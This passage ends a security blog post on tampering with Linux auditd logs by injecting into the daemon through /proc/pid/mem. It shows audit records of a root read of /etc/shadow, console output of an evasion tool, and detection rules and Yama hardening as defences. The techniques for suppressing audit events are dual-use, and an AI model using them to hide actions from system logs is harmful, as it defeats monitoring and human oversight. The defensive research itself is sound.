</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>SYSCALL msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690788671.579</span><span style="color:#f92672">:</span><span style="color:#ae81ff">982</span><span style="color:#f92672">):</span> arch<span style="color:#f92672">=</span>c000003e syscall<span style="color:#f92672">=</span><span style="color:#ae81ff">257</span> success<span style="color:#f92672">=</span>yes exit<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> a0<span style="color:#f92672">=</span>ffffff9c a1<span style="color:#f92672">=</span><span style="color:#ae81ff">7f</span>fc22a71772 a2<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> a3<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> items<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> ppid<span style="color:#f92672">=</span><span style="color:#ae81ff">1022</span> pid<span style="color:#f92672">=</span><span style="color:#ae81ff">1228</span> auid<span style="color:#f92672">=</span><span style="color:#ae81ff">4294967295</span> uid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> gid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> euid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> suid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> fsuid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> egid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> sgid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> fsgid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> tty<span style="color:#f92672">=</span>pts1 ses<span style="color:#f92672">=</span><span style="color:#ae81ff">4294967295</span> comm<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;cat&#34;</span> exe<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/usr/bin/cat&#34;</span> key<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;etcpasswd&#34;</span>ARCH<span style="color:#f92672">=</span>x86_64 SYSCALL<span style="color:#f92672">=</span>openat AUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;unset&#34;</span> UID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> GID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> EUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> SUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> FSUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> EGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> SGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> FSGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>PATH msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690788671.579</span><span style="color:#f92672">:</span><span style="color:#ae81ff">982</span><span style="color:#f92672">):</span> item<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/etc/shadow&#34;</span> inode<span style="color:#f92672">=</span><span style="color:#ae81ff">270575</span> dev<span style="color:#f92672">=</span>ca<span style="color:#f92672">:</span><span style="color:#ae81ff">03</span> mode<span style="color:#f92672">=</span><span style="color:#ae81ff">0100000</span> ouid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> ogid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> rdev<span style="color:#f92672">=</span><span style="color:#ae81ff">00</span><span style="color:#f92672">:</span><span style="color:#ae81ff">00</span> nametype<span style="color:#f92672">=</span>NORMAL cap_fp<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fi<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fe<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fver<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_frootid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>OUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> OGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>PROCTITLE msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690788671.579</span><span style="color:#f92672">:</span><span style="color:#ae81ff">982</span><span style="color:#f92672">):</span> proctitle<span style="color:#f92672">=</span><span style="color:#ae81ff">636174002</span>F6574632F736861646F77
</span></span></code></pre></div><p>Once again, the event <code>981</code> caused by the shadow access from PID <code>1059</code>
is not logged. Patching of <em>auditd</em> was successful. Using more dedicated shellcode
it would be possible to replace suspicious strings, to hide the missing event
IDs or to perform other evasion types.</p>
<h4 id="detection-1">Detection</h4>
<p>In contrast to <em>daphne</em>, the demonstration above shows the <em>auditd</em> logs with
<em>ptrace</em> logging enabled. No tricks. No double bottom. Even using the full <em>auditd</em>
configuration mentioned above does not create a single event when executing <em>apollon</em>.
So how can process injection via <code>/proc/pid/mem</code> be detected?</p>
<p>An attempt would be to use <em>auditd</em> file system rules to detect write access
to <code>/proc/PID/mem</code> of the <em>auditd</em> process. However, as it turns out, this is not
easy. To the best of our knowledge, it is not possible to define dynamic rules within
<em>auditd</em> rule files. Also, wildcards are not supported. Hence, the following rules are
not working:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>-w /proc/$pid/mem -p wa -k process-injection  <span style="color:#75715e"># does not work since no variable support</span>
</span></span><span style="display:flex;"><span>-w /proc/*/mem -p wa -k process-injection  <span style="color:#75715e"># does not work since no wildcard support</span>
</span></span></code></pre></div><p>That being said, rules can be created dynamically using <code>auditctl</code>.
The following listing shows an example of a modified <em>systemd auditd</em> unit file that
dynamically adds a file system rule for <code>/proc/pid/mem</code> of the <em>auditd</em> process:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-ini" data-lang="ini"><span style="display:flex;"><span><span style="color:#66d9ef">[Service]</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Type</span><span style="color:#f92672">=</span><span style="color:#e6db74">forking</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">PIDFile</span><span style="color:#f92672">=</span><span style="color:#e6db74">/run/auditd.pid</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">ExecStart</span><span style="color:#f92672">=</span><span style="color:#e6db74">/sbin/auditd</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## To not use augenrules, copy this file to /etc/systemd/system/auditd.service</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## and comment/delete the next line and uncomment the auditctl line.</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## NOTE: augenrules expect any rules to be added to /etc/audit/rules.d/</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">ExecStartPost</span><span style="color:#f92672">=</span><span style="color:#e6db74">-/sbin/augenrules --load</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">ExecStartPost</span><span style="color:#f92672">=</span><span style="color:#e6db74">/bin/bash -c &#34;auditctl -w /proc/$(cat /run/auditd.pid)/mem -k process-injection&#34;</span>
</span></span></code></pre></div><p>After applying this configuration and restarting the <em>auditd</em> daemon, <em>apollon</em> is
detected by the file system rule:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-java" data-lang="java"><span style="display:flex;"><span>type<span style="color:#f92672">=</span>SYSCALL msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690793788.842</span><span style="color:#f92672">:</span><span style="color:#ae81ff">4517</span><span style="color:#f92672">):</span> arch<span style="color:#f92672">=</span>c000003e syscall<span style="color:#f92672">=</span><span style="color:#ae81ff">257</span> success<span style="color:#f92672">=</span>yes exit<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> a0<span style="color:#f92672">=</span>ffffff9c a1<span style="color:#f92672">=</span><span style="color:#ae81ff">7f</span>fdc935c0c0 a2<span style="color:#f92672">=</span><span style="color:#ae81ff">2</span> a3<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> items<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> ppid<span style="color:#f92672">=</span><span style="color:#ae81ff">1281</span> pid<span style="color:#f92672">=</span><span style="color:#ae81ff">1518</span> auid<span style="color:#f92672">=</span><span style="color:#ae81ff">4294967295</span> uid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> gid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> euid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> suid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> fsuid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> egid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> sgid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> fsgid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> tty<span style="color:#f92672">=</span>pts0 ses<span style="color:#f92672">=</span><span style="color:#ae81ff">4294967295</span> comm<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;apollon-selecti&#34;</span> exe<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/home/user/apollon/apollon-selective-x64&#34;</span> key<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;process-injection&#34;</span>ARCH<span style="color:#f92672">=</span>x86_64 SYSCALL<span style="color:#f92672">=</span>openat AUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;unset&#34;</span> UID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> GID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> EUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> SUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> FSUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> EGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> SGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> FSGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>PATH msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690793788.842</span><span style="color:#f92672">:</span><span style="color:#ae81ff">4517</span><span style="color:#f92672">):</span> item<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/proc/1492/mem&#34;</span> inode<span style="color:#f92672">=</span><span style="color:#ae81ff">22345</span> dev<span style="color:#f92672">=</span><span style="color:#ae81ff">00</span><span style="color:#f92672">:</span><span style="color:#ae81ff">13</span> mode<span style="color:#f92672">=</span><span style="color:#ae81ff">0100600</span> ouid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> ogid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> rdev<span style="color:#f92672">=</span><span style="color:#ae81ff">00</span><span style="color:#f92672">:</span><span style="color:#ae81ff">00</span> nametype<span style="color:#f92672">=</span>NORMAL cap_fp<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fi<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fe<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fver<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_frootid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>OUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> OGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>PROCTITLE msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690793788.842</span><span style="color:#f92672">:</span><span style="color:#ae81ff">4517</span><span style="color:#f92672">):</span> proctitle<span style="color:#f92672">=</span><span style="color:#ae81ff">2E2F</span><span style="color:#ae81ff">61706</span>F6C6C6F6E2D73656C6563746976652D7836340031343932006461646161
</span></span></code></pre></div><p>As shown, dynamically adding monitoring for the <code>/proc/pid/mem</code> path of important processes
can detect process injection attempts. But we can do even better! Remember the
<a href="https://www.kernel.org/doc/html/v4.15/admin-guide/LSM/Yama.html">Yama</a> security module
mentioned above when discussing the detection of <em>daphne</em>? It also affects <code>/proc/pid/mem</code>!
The following listing shows the relevant quote from the <a href="https://man7.org/linux/man-pages/man5/proc.5.html">proc manual</a>:</p>
<blockquote>
<p>Permission to access this file is governed by a ptrace
access mode <code>PTRACE_MODE_ATTACH_FSCREDS</code> check; see
ptrace(2).</p>
</blockquote>
<p>In fact, <code>ptrace</code> is not the only operation that requires <em>ptrace access mode permissions</em>.
Many parts of the <code>/proc/pid</code> directory are subject to such <em>ptrace access checks</em> that are
performed by security modules like <em>Yama</em>. Denying ptrace by using a restrictive <code>ptrace_scope</code>
configuration prevents <em>apollon</em> from accessing <em>auditd</em> process memory via <code>/proc/pid/mem</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>[root@host ~]# echo -n <span style="color:#ae81ff">3</span> &gt; /proc/sys/kernel/yama/ptrace_scope
</span></span><span style="display:flex;"><span>[root@host ~]# ./apollon-selective-x64 <span style="color:#ae81ff">1547</span> <span style="color:#ae81ff">1059</span>
</span></span><span style="display:flex;"><span>[+] Found data segment of 1547 at 0x79edb37b8000
</span></span><span style="display:flex;"><span>[+] Found libc base address of 1547 at 0x79edb3488000
</span></span><span style="display:flex;"><span>[+] Found offset of &#39;recvfrom&#39; in libc at e7cc0
</span></span><span style="display:flex;"><span>[+] Searching for pattern 0x79edb356fcc0 in data segment of 1547
</span></span><span style="display:flex;"><span>[+] Data segment is 2000 bytes long.
</span></span><span style="display:flex;"><span>[-] Function &#39;recvfrom&#39; was not found in GOT of 1547.
</span></span></code></pre></div><p><em>apollon</em> failed to find the <code>recvfrom</code> pointer within the <em>GOT</em> of
<code>libaudit.so</code>, as reading <em>auditd</em> process memory via <code>/proc/pid/mem</code> was not possible.
All previous address reads affected <code>/proc/pid/maps</code>, which is still allowed as it only
requires <code>PTRACE_MODE_READ_FSCREDS</code>.</p>
<p>Some of the detection mechanisms for <em>daphne</em> mentioned above can be used for detecting
<em>apollon</em>. Missing event IDs and <em>auditd</em> error messages can also be observed when dropping
events using injected shellcode. However, these detection methods are obviously not
reliable, as they can be bypassed by using more dedicated shellcode.</p>
<h3 id="conclusion">Conclusion</h3>
<p>In this blog we demonstrated two different methods for tampering with event logs
generated by <em>auditd</em>. While the <em>ptrace</em> based technique was well covered by the
<em>auditd</em> rule set mentioned above, <code>/proc/pid/mem</code> based injections stayed
undetected. It is therefore recommended to implement additional measures to protect
critical processes like <em>auditd</em> or <em>laurel</em>.</p>
<p>We showed that dynamically created <em>auditd</em> rules can be used to monitor the
<code>/proc/pid/mem</code> path and to detect possible process injections attempts. As access
to this path is rather uncommon, such a detection should cause a low
amount of false positives. However, this might differ depending on the installed
software. Especially <em>EDR</em> applications that perform memory scanning might use this
path for legitimate purpose.</p>
<p>If possible, it is recommended to restrict <em>ptrace</em> access completely, especially on
production systems. This can be achieved for all processes by utilizing already existing
security modules like <a href="https://www.kernel.org/doc/html/v4.15/admin-guide/LSM/Yama.html">Yama</a>
or by writing a custom module, that only protects specific processes like <em>auditd</em>,
<em>laurel</em> or log forwarding agents.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/linux-audit">https://github.com/linux-audit</a></li>
<li><a href="https://man7.org/linux/man-pages/man2/ptrace.2.html">https://man7.org/linux/man-pages/man2/ptrace.2.html</a></li>
<li><a href="https://man7.org/linux/man-pages/man5/proc.5.html">https://man7.org/linux/man-pages/man5/proc.5.html</a></li>
<li><a href="https://offlinemark.com/2021/05/12/an-obscure-quirk-of-proc/">https://offlinemark.com/2021/05/12/an-obscure-quirk-of-proc/</a></li>
<li><a href="https://lwn.net/Articles/692203/">https://lwn.net/Articles/692203/</a></li>
<li><a href="https://www.kernel.org/doc/html/v4.15/admin-guide/LSM/Yama.html">https://www.kernel.org/doc/html/v4.15/admin-guide/LSM/Yama.html</a></li>
</ul>
<h3 id="source-code">Source Code</h3>
<ul>
<li><a href="https://github.com/codewhitesec/daphne">https://github.com/codewhitesec/daphne</a></li>
<li><a href="https://github.com/codewhitesec/apollon">https://github.com/codewhitesec/apollon</a></li>
</ul>

            </div>
        </article>

    </div>


            </main>
        </div>
    </div>
    </body>
</html>
